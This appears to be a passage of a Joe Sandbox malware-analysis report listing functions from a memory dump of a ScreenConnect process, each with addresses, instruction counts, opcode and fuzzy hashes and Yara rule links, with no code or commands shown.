                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: V
                                                                                                                                                                                                                                                          • API String ID: 0-1342839628
                                                                                                                                                                                                                                                          • Opcode ID: d78555a5b7d860a7ec4bea5066f0f3db033b320fbf78eed4d489420832a41876
                                                                                                                                                                                                                                                          • Instruction ID: d37abb27149af1a2c0971c3302592acb373b131df38f74dbe44a2ed41491ce79
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d78555a5b7d860a7ec4bea5066f0f3db033b320fbf78eed4d489420832a41876
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0E01B3155D3919FC342DF349D55545BFF0AB46600F0984EED588C7652D735AC0ACB93
                                                                                                                                                                                                                                                          Function 016C7623 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1c4128783ef06e492d55f82d47f507bede81f3bfa384f63d14ff3b8389eeb250
                                                                                                                                                                                                                                                          • Instruction ID: 5173958c4eb5bbb3217f325849f7261402c15cdffbac03fe98ad9eada3f202d2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c4128783ef06e492d55f82d47f507bede81f3bfa384f63d14ff3b8389eeb250
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9714232E043858FD702CB78DD58BDCBFB1EF46310F15819AD000AB2A9EB799949CB61
                                                                                                                                                                                                                                                          Function 016C7770 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1b0bd0352b8dab51192541492da5782e0301c712fe6130391f6554feada46ddb
                                                                                                                                                                                                                                                          • Instruction ID: 44f9785ef2adf1b4b80a2da6bb694f2135a6197e74269ad579cfa2f3c5ebfc86
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b0bd0352b8dab51192541492da5782e0301c712fe6130391f6554feada46ddb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C451AF30E003499FDB05DF78DD88B9DBBB1FF49310F10855AE414AB2A5DB79A989CB50
                                                                                                                                                                                                                                                          Function 016C1818 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1821d82d046f67e82749a00013d728e641255016b796fc2f291288172686a420
                                                                                                                                                                                                                                                          • Instruction ID: 37d1c2c6a8657526e57c4ebec21b269ae5211f5843e68385355dcdebd0cc1fe8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1821d82d046f67e82749a00013d728e641255016b796fc2f291288172686a420
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF418876A4E3C09FC71747749C244AA3FB0DE5766071F00EBD485CB2A3D6298C0ACB62
                                                                                                                                                                                                                                                          Function 016C4940 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3cdcff57655946f48228ea44efbb7e33af055b8f0d28b6dd9ad2d42ea2d605c3
                                                                                                                                                                                                                                                          • Instruction ID: f4f3bb047e68e12b164524ca2d6e2fc2972c5529ff1e64c02afb42d40b9ead6d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cdcff57655946f48228ea44efbb7e33af055b8f0d28b6dd9ad2d42ea2d605c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85511D34600A01CFC734CF69D894A66BBF2FF8D724B145A6CD5969B7A8DB31E806CB44
                                                                                                                                                                                                                                                          Function 016C3608 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ef12239b44f21a7b79b549480491f8b4f7d42c947f22b3242d2c33f4a09c0d48
                                                                                                                                                                                                                                                          • Instruction ID: d4d9d01a0ce9d8d50fff02279c26716127732dd84a5879844b8ba1cc580c0b8c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef12239b44f21a7b79b549480491f8b4f7d42c947f22b3242d2c33f4a09c0d48
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B514C746007058FCB34CF29D9446AABBF1FF48725B148A6DE056DB7A5DB30E84ACB90
                                                                                                                                                                                                                                                          Function 016C6208 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 77537ad8f80d45b3a7e68ef21e91d909fa3af94420e7217ac40114e1b1a3f84c
                                                                                                                                                                                                                                                          • Instruction ID: 35c5d9f4b0eac76b31f5d28e6fe1b60a758d976d852cf1cebe872083ef15cd6d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77537ad8f80d45b3a7e68ef21e91d909fa3af94420e7217ac40114e1b1a3f84c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92415B306102119FCB18DB79DC58AAEBBF6FF88A10B14856DE40AE73A1DF719C05CB95
                                                                                                                                                                                                                                                          Function 016C3668 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f9b9e03dc33b8b9d437f4023badf8541b5f23b6ac9ce93b12e4949c0d6f24cce
                                                                                                                                                                                                                                                          • Instruction ID: c593f68d30cb3ce578d131fb5330d6322a052d9cb20803da75eb7bf3d564714d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9b9e03dc33b8b9d437f4023badf8541b5f23b6ac9ce93b12e4949c0d6f24cce
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75415A746007058FDB34DF69D9486AABBF2FB48711B148A2CE056C77A5DB30E84ACB94
                                                                                                                                                                                                                                                          Function 016C3678 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2e7c4c86e28769fa63c0b4a3d48c362425ae32ab845e6a58a8c26f4c80327b31
                                                                                                                                                                                                                                                          • Instruction ID: ef0fd97c50d1d3eef814583f6e8a8cb903ba642120a366444750d3942351572c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e7c4c86e28769fa63c0b4a3d48c362425ae32ab845e6a58a8c26f4c80327b31
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77412D746007058FDB74DF29D94866ABBF2FF48710B108A2CE456D77A5DB30E84ACBA4
                                                                                                                                                                                                                                                          Function 016C3DC0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f93e54d0d7ac05bef4d707fabcfafbe307d3815af46d34292aa51cc91d048011
                                                                                                                                                                                                                                                          • Instruction ID: d99adc57b6fc350825ab30cddb84f03f37aadc0fe05f0bd9ca5ae617672043e4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f93e54d0d7ac05bef4d707fabcfafbe307d3815af46d34292aa51cc91d048011
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02313A31B002058BDB249F69C8986BEFBF6FF89754F14946EE506E7354DB709C058B90
                                                                                                                                                                                                                                                          Function 016C3828 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 99d006007b865e27a777dbcd28d42b3423a3eac02117aeecdb7307ef518554e2
                                                                                                                                                                                                                                                          • Instruction ID: 79c6b3634c502dd506bb36e0f299d55c77a42534730d471c2af7e37a5ada8fdc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99d006007b865e27a777dbcd28d42b3423a3eac02117aeecdb7307ef518554e2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D31DF71F042058FCB05DB6CC8546BEFBB6FF88210B1081AAD909DB386EB30AD06C791
                                                                                                                                                                                                                                                          Function 016C5548 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 66048ae587196ecfdc0737f2c201d74132568d5eb77be22d58517daf45d92504
                                                                                                                                                                                                                                                          • Instruction ID: 201156c652f0a70dfe10d9a25f53276ce7d27fdfa14b05143802c06883f03e68
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66048ae587196ecfdc0737f2c201d74132568d5eb77be22d58517daf45d92504
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4531F370600A018FC730DF29DC94A6ABBF2EF89721B144A2CD496DB7A5D730F906CB91
                                                                                                                                                                                                                                                          Function 016C5FB7 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: dbdcae1d8f3d165c538ca3d4d59b8bd00e5db53dbbb4d99fcaeb3661524c3b3f
                                                                                                                                                                                                                                                          • Instruction ID: 63349b207e383f9b01081efdc709eafbd5a1cd08145115c5af6a56402c272d1b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbdcae1d8f3d165c538ca3d4d59b8bd00e5db53dbbb4d99fcaeb3661524c3b3f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C1127317006421BD725865CDE41A36BBE7DFC5A60B28C97DE469CB346EB21EC018791
                                                                                                                                                                                                                                                          Function 016C50C1 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 413e1f3f9b6599645447a5f651d41afcd21df3e338fbcc283472dd1373f21672
                                                                                                                                                                                                                                                          • Instruction ID: 75e8a2efb5e25d1a3b3339757662cd1d4fdae249307676921fac8f7768c98c68
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 413e1f3f9b6599645447a5f651d41afcd21df3e338fbcc283472dd1373f21672
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21C0307102015BD700EB78DD546AE7BA7FFCA210F408529E449AB398DF70AD09C7E5
                                                                                                                                                                                                                                                          Function 016C6E48 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 55a82b3a9c41f63059cec638a3d07c3e14e5ee673ee33448a9fee9ce6d5eb4fc
                                                                                                                                                                                                                                                          • Instruction ID: 4381b16df48ec7dd773df36101daf27e54d0800f12a3c31204b1e2d8e8c1a091
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a82b3a9c41f63059cec638a3d07c3e14e5ee673ee33448a9fee9ce6d5eb4fc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51112732B083525FD7068F28DC500AABFF5FB8AA50314466FD405CB352DB769C0A8BD8
                                                                                                                                                                                                                                                          Function 016C4B70 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 202a1b8978968a0deb0ebb53026aed83789c631321e9a5ca001d0e53c086ca74
                                                                                                                                                                                                                                                          • Instruction ID: 665836feb2a4b8dfc5ed01f34da034d798cc951391c2a338f3cfd4c7eb1da91c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 202a1b8978968a0deb0ebb53026aed83789c631321e9a5ca001d0e53c086ca74
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B213E302006059FC734DF29DC586AABBF1EF44720B109B2DD592976A5DB31E94ACF80
                                                                                                                                                                                                                                                          Function 016C50D0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0df6eb6da46d08ebd53da918c4066e8e745cdf2e672b527da85e007a6251f85c
                                                                                                                                                                                                                                                          • Instruction ID: 6d62ac1fdd9c7c37984944876d433c0ab815978c25fe71efd7dd3cc1dfde04dd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0df6eb6da46d08ebd53da918c4066e8e745cdf2e672b527da85e007a6251f85c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11D0317102065BD700EB68DD94BAEBBA7FBC8210F408529E509AB388DF70AD09C7E5
                                                                                                                                                                                                                                                          Function 016C4F40 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: efd234dd5e22d8b9f1c66d6cc4db330d09420dd36258a65c298d8c88af24bca7
                                                                                                                                                                                                                                                          • Instruction ID: a926c7bdd104aefa1211796e3d1c4990050a4902e2d00caacce5355e20980446
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efd234dd5e22d8b9f1c66d6cc4db330d09420dd36258a65c298d8c88af24bca7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11AF3290024ACFCF01DFA8C9809DDBBB1EF0A300B15809AD504FB261D631AA09CBA1
                                                                                                                                                                                                                                                          Function 016C5648 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8949d2587a813224051bca1ae9d29951553bc4094df3abcf4715ab3cac0e14c1
                                                                                                                                                                                                                                                          • Instruction ID: 433a4dc7b640f1098e0ca5947baa88e3730fc5f5f1466260a858955f6335390b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8949d2587a813224051bca1ae9d29951553bc4094df3abcf4715ab3cac0e14c1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07110471F043509FDB12DF69DD009BABBB1EF81610F0884ABD581DB275D331A905CB91
                                                                                                                                                                                                                                                          Function 016C5658 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8d2f99b4ec927de73304edda2aaf1805164f7ed567b9059d749f9618527da8ac
                                                                                                                                                                                                                                                          • Instruction ID: 50228a589898605647bb8ec32c3e980c33c82db52f1c8019129c8974c3583c6d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d2f99b4ec927de73304edda2aaf1805164f7ed567b9059d749f9618527da8ac
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C118E70F00215AFDB14EA6ADC00ABBBBB6EFC4710F14846AE555D7264D771AA028B91
                                                                                                                                                                                                                                                          Function 016C5035 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 35a055b96343880948a861826ea16d32ff656b873e4aae669631c5816f1871f8
                                                                                                                                                                                                                                                          • Instruction ID: 0e26a55a6d7f02f8a921151fbfde84eb6b6f00649db3b34820557091591ad8ac
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35a055b96343880948a861826ea16d32ff656b873e4aae669631c5816f1871f8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2115B3160000ADBCB00DFA8DD849ECBBB2FF84304B54C559E006AB129DB71E946CBA1
                                                                                                                                                                                                                                                          Function 016C4F50 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a28c8b3c5b95ef8525fd26d28eaecae0379e9faa1d183838af3b6055a98f7e11
                                                                                                                                                                                                                                                          • Instruction ID: 19d2cbb2c32413c6a6593523842e2dbb7f6fe3368246607b62b650c8c673a008
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a28c8b3c5b95ef8525fd26d28eaecae0379e9faa1d183838af3b6055a98f7e11
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F11123590010ADFCF00DFA8D9809DEBBF5FF49314B10856AD509BB264D771AA0ACB90
                                                                                                                                                                                                                                                          Function 016C4FD0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9c9e6d4831ec60f197f4e1f42924cf49e005f9710dab2218f55534ddb6f083a2
                                                                                                                                                                                                                                                          • Instruction ID: b7d5a6e76c1da2f74a46914391ded2fabd8202578a1dc3afc1492cdc0e848c86
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c9e6d4831ec60f197f4e1f42924cf49e005f9710dab2218f55534ddb6f083a2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15019E32E0011ADBCF04DFA8E8148DDBBB2FFC9710F05852AD415BB260CB31A95ACB90
                                                                                                                                                                                                                                                          Function 0166D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733554312.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_166d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f257148c3f94664154db2826f2e33d030ece2b46e2a0875152937680bb0153bd
                                                                                                                                                                                                                                                          • Instruction ID: f3492af91d7680e8ed881bc05b573e0378df7189173ae542f637ec160f16c911
